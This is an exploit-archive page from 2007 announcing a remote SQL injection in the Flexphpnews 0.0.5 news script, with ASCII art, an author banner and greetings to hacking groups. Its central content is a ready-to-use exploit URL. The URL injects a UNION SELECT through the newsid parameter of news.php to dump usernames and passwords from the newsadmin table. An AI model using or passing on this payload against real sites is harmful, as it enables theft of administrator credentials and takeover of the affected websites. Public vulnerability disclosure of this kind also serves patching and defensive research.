[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability
# Published : 2007-04-01
# Author : Dj7xpl
# Previous Title : XOOPS Module debaser <= 0.92 (genre.php) BLIND SQL Injection Exploit
# Next Title : XOOPS Module myAlbum-P <= 2.0 (cid) Remote SQL Injection Exploit


.-""""""""-.                                 
                                                         /   Dj7xpl                                 
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  o_)( |                                     
                                                        |/     /     |                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) _________|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-IIIIII/-|________________________________>
                                               )_/                  / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    Flexphpnews version 0.0.5
*	[~] Download.....:    http://www.china-on-site.com/flexphpsite/other.php
*	[~] Author.......:    Dj7xpl  | Dj7xpl@yahoo.com
*	[~] Class........:    Remote SQL Injection Vulnerability
*
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*       [~] Exploit......:     http://[Taget]/[Path]/news.php?newsid=999+union+select+0,username,password+from+newsadmin
*
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*       [~] Sp Tnx.......:     Milw0rm, Ashiyane, Delta Hacking, Virangar, Hackerz.ir, Shabgard.org, Simorgh .........
*
+_______________________________________________________________________________________________________________________+

# www.Syue.com [2007-04-01]